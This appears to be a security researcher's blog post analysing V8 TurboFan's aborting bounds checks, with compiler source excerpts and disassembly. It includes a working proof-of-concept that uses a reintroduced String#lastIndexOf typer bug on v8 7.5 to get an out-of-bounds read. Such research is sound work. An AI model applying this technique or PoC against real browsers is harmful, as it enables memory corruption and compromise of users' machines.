Introduction

Some recent Chrome exploits took advantage of bounds check elimination to get a R/W primitive from a TurboFan typer bug (a bug that incorrectly computes type information during code optimization). Indeed, during the simplified lowering phase, when visiting a CheckBounds node, if the engine can guarantee that the index is always in bounds, then the CheckBounds is considered redundant and thus removed. I explained this in my previous article. Recently, TurboFan introduced a change that adds aborting bounds checks. It means that CheckBounds will never get removed during simplified lowering. As mentioned in Mark Brand's article on the Google Project Zero blog and by tsuro in his zer0con talk, this could be problematic for exploitation. This short post discusses the hardening change and how to exploit typer bugs against the latest versions of v8. As an example, I provide a sample exploit that works on v8 7.5.0.

Introduction of aborting bound checks

Aborting bounds checks have been introduced by the following commit:

commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5

Author: Jaroslav Sevcik <jarin@chromium.org>

Date: Fri Feb 8 16:26:18 2019 +0100

[turbofan] Introduce aborting bounds checks.

Instead of eliminating bounds checks based on types, we introduce

an aborting bounds check that crashes rather than deopts.

Bug: v8:8806

Change-Id: Icbd9c4554b6ad20fe4135b8622590093679dac3f

Reviewed-on: https://chromium-review.googlesource.com/c/1460461

Commit-Queue: Jaroslav Sevcik <jarin@chromium.org>

Reviewed-by: Tobias Tebbi <tebbi@chromium.org>

Cr-Commit-Position: refs/heads/master@{#59467}

Simplified lowering

First, what has changed is the CheckBounds node visitor of simplified-lowering.cc:

void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {

CheckParameters const& p = CheckParametersOf(node->op());

Type const index_type = TypeOf(node->InputAt(0));

Type const length_type = TypeOf(node->InputAt(1));

if (length_type.Is(Type::Unsigned31())) {

if (index_type.Is(Type::Integral32OrMinusZero())) {

// Map -0 to 0, and the values in the [-2^31,-1] range to the

// [2^31,2^32-1] range, which will be considered out-of-bounds

// as well, because the {length_type} is limited to Unsigned31.

VisitBinop(node, UseInfo::TruncatingWord32(),

MachineRepresentation::kWord32);

if (lower()) {

CheckBoundsParameters::Mode mode =

CheckBoundsParameters::kDeoptOnOutOfBounds;

if (lowering->poisoning_level_ ==

PoisoningMitigationLevel::kDontPoison &&

(index_type.IsNone() || length_type.IsNone() ||

(index_type.Min() >= 0.0 &&

index_type.Max() < length_type.Min()))) {

// The bounds check is redundant if we already know that

// the index is within the bounds of [0.0, length[.

mode = CheckBoundsParameters::kAbortOnOutOfBounds; // [1]

}

NodeProperties::ChangeOp(

node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]

}

// [...]

}

Before the commit, when the condition guarding [1] held, the bounds check was removed with a call to DeferReplacement(node, node->InputAt(0));. Now, the node is instead lowered to a CheckedUint32Bounds with an AbortOnOutOfBounds mode [2].


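
To make the decision at [1] easier to follow, here is a minimal JavaScript sketch of the mode selection. It is only a model: types are plain {min, max} ranges, the names Mode and selectCheckBoundsMode are mine, and the poisoning level and the IsNone() cases of the real code are left out.

```javascript
// Simplified model of the mode selection in VisitCheckBounds.
// Types are modelled as closed ranges {min, max}; this is an illustration,
// not V8's actual Type class. Mode and selectCheckBoundsMode are
// hypothetical names.
const Mode = Object.freeze({
  kDeoptOnOutOfBounds: "kDeoptOnOutOfBounds",
  kAbortOnOutOfBounds: "kAbortOnOutOfBounds",
});

function selectCheckBoundsMode(indexType, lengthType) {
  // Same test as the condition guarding [1]: the index is statically
  // known to be within [0, length[.
  const provablyInBounds =
    indexType.min >= 0 && indexType.max < lengthType.min;
  return provablyInBounds
    ? Mode.kAbortOnOutOfBounds
    : Mode.kDeoptOnOutOfBounds;
}

// Index typed as Range(0, 0) into an array of length 4: aborting check.
console.log(selectCheckBoundsMode({ min: 0, max: 0 }, { min: 4, max: 4 }));
// Index typed as Range(0, 10): not provably in bounds, keep the deopt check.
console.log(selectCheckBoundsMode({ min: 0, max: 10 }, { min: 4, max: 4 }));
```

The point to take away is that the "provably in bounds" case no longer drops the check; it only changes what happens if the check fails.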

Effect linearization

When the effect control linearizer (one of the optimization phases) kicks in, here is how the CheckedUint32Bounds gets lowered:

Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,

Node* frame_state) {

Node* index = node->InputAt(0);

Node* limit = node->InputAt(1);

const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());

Node* check = __ Uint32LessThan(index, limit);

switch (params.mode()) {

case CheckBoundsParameters::kDeoptOnOutOfBounds:

__ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,

params.check_parameters().feedback(), check,

frame_state, IsSafetyCheck::kCriticalSafetyCheck);

break;

case CheckBoundsParameters::kAbortOnOutOfBounds: {

auto if_abort = __ MakeDeferredLabel();

auto done = __ MakeLabel();

__ Branch(check, &done, &if_abort);

__ Bind(&if_abort);

__ Unreachable();

__ Goto(&done);

__ Bind(&done);

break;

}

}

return index;

}

Long story short, the CheckedUint32Bounds is replaced by a Uint32LessThan node (plus the index and limit nodes). In case of an out-of-bounds access, no deoptimization is possible; instead, we reach an Unreachable node.

During instruction selection, Unreachable nodes are replaced by breakpoint opcodes.

void InstructionSelector::VisitUnreachable(Node* node) {

OperandGenerator g(this);

Emit(kArchDebugBreak, g.NoOutput());

}
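
The behaviour of the lowered check can be sketched in a few lines of JavaScript. This is a model under my own assumptions, not V8 code: uint32LessThan and checkedUint32Bounds are hypothetical helpers, and the thrown errors merely stand in for the breakpoint and the deoptimization.

```javascript
// Model of the lowered CheckedUint32Bounds. `>>> 0` reinterprets a value as
// an unsigned 32-bit integer, which is what Uint32LessThan compares.
function uint32LessThan(a, b) {
  return (a >>> 0) < (b >>> 0);
}

function checkedUint32Bounds(index, limit, mode) {
  if (uint32LessThan(index, limit)) return index;
  if (mode === "kAbortOnOutOfBounds") {
    // Stands in for the Unreachable node (a breakpoint in generated code).
    throw new Error("abort: unreachable code reached");
  }
  // Stands in for DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds, ...).
  throw new Error("deopt: out of bounds");
}

console.log(checkedUint32Bounds(3, 4, "kAbortOnOutOfBounds"));
console.log(uint32LessThan(-1, 0x7fffffff));
```

The unsigned comparison is what makes a single check enough: as the comment in VisitCheckBounds says, negative indices map to the [2^31,2^32-1] range and are therefore out of bounds for any Unsigned31 length.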

Experimenting

Ordinary behaviour

Let's first experiment with some normal behaviour in order to get a grasp of what happens with bound checking. Consider the following code.

var opt_me = () => {

let arr = [1,2,3,4];

let badly_typed = 0;

let idx = badly_typed * 5;

return arr[idx];

};

opt_me();

%OptimizeFunctionOnNextCall(opt_me);

opt_me();

With this example, we're going to observe a few things:

- simplified lowering does not remove the CheckBounds node as it would have before,

- the lowering of this node and how it leads to the creation of an Unreachable node,

- eventually, bound checking will get completely removed (which is correct and expected).

Typing of a CheckBounds



Unsurprisingly, a CheckBounds node is generated and gets a type of Range(0,0) during the typer phase.



CheckBounds lowering to CheckedUint32Bounds

The CheckBounds node is not removed during simplified lowering the way it would have been before. It is lowered to a CheckedUint32Bounds instead.



Effect Linearization: CheckedUint32Bounds to Uint32LessThan with Unreachable

Let's have a look at the effect linearization.

The CheckedUint32Bounds is replaced by several nodes. Instead of this bound checking node, there is a Uint32LessThan node that either leads to a LoadElement node or an Unreachable node.



Late optimization: MachineOperatorReducer and DeadCodeElimination

It seems pretty obvious that the Uint32LessThan can be lowered to a constant true (Int32Constant). Once the Uint32LessThan is replaced by a constant node, the branch that can no longer be taken, including the Unreachable node, is removed by dead code elimination. Therefore, no bounds check remains and no breakpoint will ever be reached, regardless of any OOB accesses that are attempted.

// Perform constant folding and strength reduction on machine operators.

Reduction MachineOperatorReducer::Reduce(Node* node) {

switch (node->opcode()) {

// [...]

case IrOpcode::kUint32LessThan: {

Uint32BinopMatcher m(node);

if (m.left().Is(kMaxUInt32)) return ReplaceBool(false); // M < x => false

if (m.right().Is(0)) return ReplaceBool(false); // x < 0 => false

if (m.IsFoldable()) { // K < K => K

return ReplaceBool(m.left().Value() < m.right().Value());

}

if (m.LeftEqualsRight()) return ReplaceBool(false); // x < x => false

if (m.left().IsWord32Sar() && m.right().HasValue()) {

Int32BinopMatcher mleft(m.left().node());

if (mleft.right().HasValue()) {

// (x >> K) < C => x < (C << K)

// when C < (M >> K)

const uint32_t c = m.right().Value();

const uint32_t k = mleft.right().Value() & 0x1F;

if (c < static_cast<uint32_t>(kMaxInt >> k)) {

node->ReplaceInput(0, mleft.left().node());

node->ReplaceInput(1, Uint32Constant(c << k));

return Changed(node);

}

// TODO(turbofan): else the comparison is always true.

}

}

break;

}

// [...]


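
The folding rules that matter here can be modelled as follows. This is a sketch under my own assumptions: operands are either {constant: n} or {node: "name"}, reduceUint32LessThan is a hypothetical name, and the Word32Sar strength reduction from the excerpt above is deliberately left out.

```javascript
const kMaxUInt32 = 0xffffffff;

// Returns true/false when the comparison folds to a constant, or null when
// no reduction applies. Operands are {constant: n} for known uint32 values
// and {node: "name"} for unknown ones.
function reduceUint32LessThan(left, right) {
  if (left.constant === kMaxUInt32) return false; // M < x => false
  if (right.constant === 0) return false; // x < 0 => false
  if (left.constant !== undefined && right.constant !== undefined) {
    return left.constant < right.constant; // both constants: fold
  }
  if (left.node !== undefined && left.node === right.node) {
    return false; // x < x => false
  }
  return null; // not reducible with these rules
}

// Index 0 against a length of 4, as in opt_me: folds to true.
console.log(reduceUint32LessThan({ constant: 0 }, { constant: 4 }));
// An unknown index against a length of 4: the comparison stays.
console.log(reduceUint32LessThan({ node: "idx" }, { constant: 4 }));
```

With a folded true, the branch to the Unreachable node is dead, which is why dead code elimination can drop it.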

Final scheduling: no more bound checking

To observe the generated code, let's first look at the final scheduling phase and confirm that eventually, only a Load at index 0 remains.

Generated assembly code

In this case, TurboFan correctly understood that no bound checking was necessary and simply generated a mov instruction movq rax, [fixed_array_base + offset_to_element_0].

To sum up:

- arr[good_idx] leads to the creation of a CheckBounds node in the early phases

- during "simplified lowering", it gets replaced by an aborting CheckedUint32Bounds

- The CheckedUint32Bounds gets replaced by several nodes during "effect linearization": Uint32LessThan and Unreachable

- Uint32LessThan is constant folded during the "Late Optimization" phase

- The Unreachable node is removed during dead code elimination of the "Late Optimization" phase

- Only a simple Load remains during the final scheduling

- Generated assembly is a simple mov instruction without bound checking

Typer bug

Let's consider the String#lastIndexOf bug where the typing of kStringIndexOf and kStringLastIndexOf is incorrect. The computed type is:

Type::Range(-1.0, String::kMaxLength - 1.0, t->zone()) instead of Type::Range(-1.0, String::kMaxLength, t->zone()). This is incorrect because both String#indexOf and String#lastIndexOf can return a value of kMaxLength. You can find more details about this bug on my github.

This bug is exploitable even with the introduction of aborting bound checks. So let's reintroduce it on v8 7.5 and exploit it.

In summary, if we use lastIndexOf on a string with a length of kMaxLength, the upper bound of the computed Range type will be kMaxLength - 1 while the value actually returned is kMaxLength.

const str = "____"+"DOARE".repeat(214748359);

String.prototype.lastIndexOf.call(str, ''); // typed as kMaxLength-1 instead of kMaxLength

We can then amplify this typing error.

let badly_typed = String.prototype.lastIndexOf.call(str, '');

badly_typed = Math.abs(Math.abs(badly_typed) + 25);

badly_typed = badly_typed >> 30; // typed as Range(0,0) although the actual value is 1

If all of this seems unclear, check my previous introduction to TurboFan and my github.
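
The arithmetic behind this amplification can be checked with a tiny interval model. This is my own sketch, not the typer's implementation: range, abs, add, sar and amplify are hypothetical helpers, and kMaxLength is taken to be the length of the poc string (4 + 5 * 214748359, which equals 2^30 - 25).

```javascript
// Length of "____" + "DOARE".repeat(214748359), i.e. kMaxLength here.
const kMaxLength = 4 + 5 * 214748359; // 1073741799 === 2 ** 30 - 25

const range = (min, max) => ({ min, max });

// Interval versions of the operations used in the amplification.
function abs(r) {
  if (r.min >= 0) return r;
  if (r.max <= 0) return range(Math.abs(r.max), Math.abs(r.min));
  return range(0, Math.max(-r.min, r.max));
}
const add = (r, k) => range(r.min + k, r.max + k);
// >> is monotonic, so shifting both bounds is enough for int32 ranges.
const sar = (r, k) => range(r.min >> k, r.max >> k);

const amplify = (r) => sar(abs(add(abs(r), 25)), 30);

// What the buggy typer believes, what a correct typer would compute,
// and what actually happens at runtime.
const buggy = amplify(range(-1, kMaxLength - 1));
const correct = amplify(range(-1, kMaxLength));
const actual = Math.abs(Math.abs(kMaxLength) + 25) >> 30;

console.log(buggy, correct, actual);
```

Adding 25 pushes the real value to exactly 2^30 while the badly typed upper bound stays at 2^30 - 1, so the shift by 30 separates them: the typer sees only 0, whereas the runtime value is 1.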

Now, consider the following trigger poc:

SUCCESS = 0;

FAILURE = 0x42;

const str = "____"+"DOARE".repeat(214748359);

let it = 0;

var opt_me = () => {

const OOB_OFFSET = 5;

let badly_typed = String.prototype.lastIndexOf.call(str, '');

badly_typed = Math.abs(Math.abs(badly_typed) + 25);

badly_typed = badly_typed >> 30;

let bad = badly_typed * OOB_OFFSET;

let leak = 0;

if (bad >= OOB_OFFSET && ++it < 0x10000) {

leak = 0;

}

else {

let arr = new Array(1.1,1.1);

arr2 = new Array({},{});

leak = arr[bad];

if (leak != undefined) {

return leak;

}

}

return FAILURE;

};

let res = opt_me();

for (let i = 0; i < 0x10000; ++i)

res = opt_me();

%DisassembleFunction(opt_me); // prints nothing on release builds

for (let i = 0; i < 0x10000; ++i)

res = opt_me();

print(res);

%DisassembleFunction(opt_me); // prints nothing on release builds

Check out the result:

$ d8 poc.js

1.5577100569205e-310

It worked despite those aborting bound checks. Why?

The line leak = arr[bad] didn’t lead to any CheckBounds elimination and yet we didn't execute any Unreachable node (aka breakpoint instruction).

Native context specialization of an element access

The answer lies in native context specialization. This is one of the early optimization phases, where the compiler is given the opportunity to specialize code in a way that capitalizes on its knowledge of the context in which the code will execute.

The inlining phase, one of the first optimization phases, includes native context specialization. For element accesses, the context specialization is done in JSNativeContextSpecialization::BuildElementAccess.

There is one case that looks very interesting when the load_mode is LOAD_IGNORE_OUT_OF_BOUNDS.

} else if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&

CanTreatHoleAsUndefined(receiver_maps)) {

// Check that the {index} is a valid array index, we do the actual

// bounds check below and just skip the store below if it's out of

// bounds for the {receiver}.

index = effect = graph()->NewNode(

simplified()->CheckBounds(VectorSlotPair()), index,

jsgraph()->Constant(Smi::kMaxValue), effect, control);

} else {

In this case, the CheckBounds node checks the index against a length of Smi::kMaxValue.

The actual bound checking nodes are added as follows:

if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&

CanTreatHoleAsUndefined(receiver_maps)) {

Node* check =

graph()->NewNode(simplified()->NumberLessThan(), index, length); // [1]

Node* branch = graph()->NewNode(

common()->Branch(BranchHint::kTrue,

IsSafetyCheck::kCriticalSafetyCheck),

check, control);

Node* if_true = graph()->NewNode(common()->IfTrue(), branch); // [2]

Node* etrue = effect;

Node* vtrue;

{

// Perform the actual load

vtrue = etrue =

graph()->NewNode(simplified()->LoadElement(element_access), // [3]

elements, index, etrue, if_true);

// [...]

}

// [...]

}

In a nutshell, with this mode:

- CheckBounds checks the index against Smi::kMaxValue (0x7FFFFFFF),

- A NumberLessThan node is generated,

- An IfTrue node is generated,

- In the "true" branch, there will be a LoadElement node.

The length used by the NumberLessThan node comes from a previously generated LoadField:

Node* length = effect =

receiver_is_jsarray

? graph()->NewNode(

simplified()->LoadField(

AccessBuilder::ForJSArrayLength(elements_kind)),

receiver, effect, control)

: graph()->NewNode(

simplified()->LoadField(AccessBuilder::ForFixedArrayLength()),

elements, effect, control);

All of this means that TurboFan does generate some bounds-checking nodes, but the aborting bounds check will not fire because it compares the index against a length of Smi::kMaxValue (well, technically it can, but an index that large is unlikely to be reached!).
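
Put together, the nodes built for this load mode behave roughly like the following function. It is a sketch under my own assumptions: loadIgnoreOutOfBounds is a hypothetical name, a plain JavaScript array stands in for the elements backing store, and holes are ignored.

```javascript
const kSmiMaxValue = 0x7fffffff; // Smi::kMaxValue

function loadIgnoreOutOfBounds(elements, index) {
  // CheckBounds(index, Smi::kMaxValue): only rejects indices that are not
  // valid array indices at all (compared as unsigned 32-bit values).
  if (!((index >>> 0) < kSmiMaxValue)) {
    throw new Error("CheckBounds failed");
  }
  // NumberLessThan(index, length) + Branch: the actual bounds check.
  if (index < elements.length) {
    return elements[index]; // LoadElement in the "true" branch
  }
  return undefined; // out-of-bounds loads yield undefined
}

console.log(loadIgnoreOutOfBounds([1.1, 1.1], 1));
console.log(loadIgnoreOutOfBounds([1.1, 1.1], 5));
```

In this model, safety rests entirely on the second comparison. If that comparison disappears, the only check left is the one against Smi::kMaxValue.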

Type narrowing and constant folding of NumberLessThan

After the typer phase, the sea of nodes contains a NumberLessThan that compares a badly typed value to the correct array length. This is interesting because the TypeNarrowingReducer is going to narrow the type of this node [2] to op_typer_.singleton_true() [1].

case IrOpcode::kNumberLessThan: {

// TODO(turbofan) Reuse the logic from typer.cc (by integrating relational

// comparisons with the operation typer).

Type left_type = NodeProperties::GetType(node->InputAt(0));

Type right_type = NodeProperties::GetType(node->InputAt(1));

if (left_type.Is(Type::PlainNumber()) &&

right_type.Is(Type::PlainNumber())) {

if (left_type.Max() < right_type.Min()) {

new_type = op_typer_.singleton_true(); // [1]

} else if (left_type.Min() >= right_type.Max()) {

new_type = op_typer_.singleton_false();

}

}

break;

}

// [...]

Type original_type = NodeProperties::GetType(node);

Type restricted = Type::Intersect(new_type, original_type, zone());

if (!original_type.Is(restricted)) {

NodeProperties::SetType(node, restricted); // [2]

return Changed(node);

}

Thanks to that, the ConstantFoldingReducer will then simply remove the NumberLessThan node and replace it by a HeapConstant node.

Reduction ConstantFoldingReducer::Reduce(Node* node) {

DisallowHeapAccess no_heap_access;

// Check if the output type is a singleton. In that case we already know the

// result value and can simply replace the node if it's eliminable.

if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

node->op()->HasProperty(Operator::kEliminatable)) {

// TODO(v8:5303): We must not eliminate FinishRegion here. This special

// case can be removed once we have separate operators for value and

// effect regions.

if (node->opcode() == IrOpcode::kFinishRegion) return NoChange();

// We can only constant-fold nodes here, that are known to not cause any

// side-effect, may it be a JavaScript observable side-effect or a possible

// eager deoptimization exit (i.e. {node} has an operator that doesn't have

// the Operator::kNoDeopt property).

Type upper = NodeProperties::GetType(node);

if (!upper.IsNone()) {

Node* replacement = nullptr;

if (upper.IsHeapConstant()) {

replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref());

} else if (upper.Is(Type::MinusZero())) {

Factory* factory = jsgraph()->isolate()->factory();

ObjectRef minus_zero(broker(), factory->minus_zero_value());

replacement = jsgraph()->Constant(minus_zero);

} else if (upper.Is(Type::NaN())) {

replacement = jsgraph()->NaNConstant();

} else if (upper.Is(Type::Null())) {

replacement = jsgraph()->NullConstant();

} else if (upper.Is(Type::PlainNumber()) && upper.Min() == upper.Max()) {

replacement = jsgraph()->Constant(upper.Min());

} else if (upper.Is(Type::Undefined())) {

replacement = jsgraph()->UndefinedConstant();

}

if (replacement) {

// Make sure the node has a type.

if (!NodeProperties::IsTyped(replacement)) {

NodeProperties::SetType(replacement, upper);

}

ReplaceWithValue(node, replacement);

return Changed(replacement);

}

}

}

return NoChange();

}

We confirm this behaviour using --trace-turbo-reduction:

- In-place update of 200: NumberLessThan(199, 225) by reducer TypeNarrowingReducer

- Replacement of 200: NumberLessThan(199, 225) with 94: HeapConstant[0x2584e3440659 <true>] by reducer ConstantFoldingReducer

At this point, there isn't any proper bound check left.
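
Here is a small model of that narrowing step applied to the poc. It is a sketch, not V8's code: narrowNumberLessThan is a hypothetical helper working on {min, max} ranges, and I assume the array length is known to be the constant 2, as the comparison against 0x2 in the first disassembly below suggests.

```javascript
// Mirrors the kNumberLessThan case of the TypeNarrowingReducer:
// returns true/false when the result is a singleton, null otherwise.
function narrowNumberLessThan(left, right) {
  if (left.max < right.min) return true; // singleton_true
  if (left.min >= right.max) return false; // singleton_false
  return null; // result unknown, the comparison must stay
}

const arrayLength = { min: 2, max: 2 }; // assumption: length is constant 2
const badlyTypedIndex = { min: 0, max: 0 }; // what the typer believes for bad
const properlyTypedIndex = { min: 0, max: 5 }; // a typing that covers bad = 5

// With the typer bug the comparison narrows to true and gets folded away.
console.log(narrowNumberLessThan(badlyTypedIndex, arrayLength));
// With a correct type it cannot be decided statically and is kept.
console.log(narrowNumberLessThan(properlyTypedIndex, arrayLength));
```

At runtime bad is 5, so the folded true is wrong and the load goes past the two elements of arr.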

Observing the generated assembly

Let's run the previous poc again. We'll disassemble the function twice.

The first optimized code we can observe contains code related to:

- a CheckBounds with a length of Smi::kMaxValue,

- a bound check with a NumberLessThan with the correct length.

===== FIRST DISASSEMBLY =====

0x11afad03119 119 41c1f91e sarl r9, 30 // badly_typed >> 30

0x11afad0311d 11d 478d0c89 leal r9,[r9+r9*4] // badly_typed * OOB_OFFSET

0x11afad03239 239 4c894de0 REX.W movq [rbp-0x20],r9

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)

0x11afad0326f 26f 817de0ffffff7f cmpl [rbp-0x20],0x7fffffff

0x11afad03276 276 0f830c010000 jnc 0x11afad03388 <+0x388> // go to Unreachable

// NumberLessThan (badly_typed, LoadField(array.length) = 2)

0x11afad0327c 27c 837de002 cmpl [rbp-0x20],0x2

0x11afad03280 280 0f8308010000 jnc 0x11afad0338e <+0x38e>

// LoadElement

0x11afad03286 286 4c8b45e8 REX.W movq r8,[rbp-0x18] // FixedArray

0x11afad0328a 28a 4c8b4de0 REX.W movq r9,[rbp-0x20] // badly_typed * OOB_OFFSET

0x11afad0328e 28e c4817b1044c80f vmovsd xmm0,[r8+r9*8+0xf] // arr[bad]

// Unreachable

0x11afad03388 388 cc int3l // Unreachable node



The second disassembly is much more interesting. Indeed, only the code corresponding to the CheckBounds remains. The actual bound check was removed!

===== SECOND DISASSEMBLY =====

0x2e987c30412f 10f c1ff1e sarl rdi, 30 // badly_typed >> 30

0x2e987c304132 112 4c8d4120 REX.W leaq r8,[rcx+0x20]

0x2e987c304136 116 8d3cbf leal rdi,[rdi+rdi*4] // badly_typed * OOB_OFFSET

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)

0x2e987c304270 250 81ffffffff7f cmpl rdi,0x7fffffff

0x2e987c304276 256 0f83b9000000 jnc 0x2e987c304335 <+0x315>

0x2e987c30427c 25c c5fb1044f90f vmovsd xmm0,[rcx+rdi*8+0xf] // unchecked access!

0x2e987c304335 315 cc int3l // Unreachable node

You can confirm it works by launching the full exploit on a patched 7.5 d8 shell.

Conclusion

As discussed in this article, the introduction of aborting CheckBounds kind of kills the CheckBounds elimination technique for typer bug exploitation. However, we demonstrated a case where TurboFan defers the bounds checking to a NumberLessThan node, which is then incorrectly constant folded because of bad typing.

Thanks for reading this. Please feel free to shoot me any feedback via my twitter: @__x86.

Special thanks to my friends Axel Souchet, yrp604 and Georgi Geshev for their review.

Also, if you're interested in TurboFan, don't miss my upcoming typhooncon talk!

A bit before publishing this post, saelo released a new phrack article on jit exploitation as well as the slides of his 0x41con talk.

References

- Samuel Groß's latest phrack on jit exploitation

- Samuel Groß's talk at 0x41con: JIT Exploitation Tricks

- My previous introduction to TurboFan

- Stephen Röttger's zer0con talk: A guided tour through Chrome's javascript compiler

- Issue 8806: Harden turbofan's bounds check against typer bugs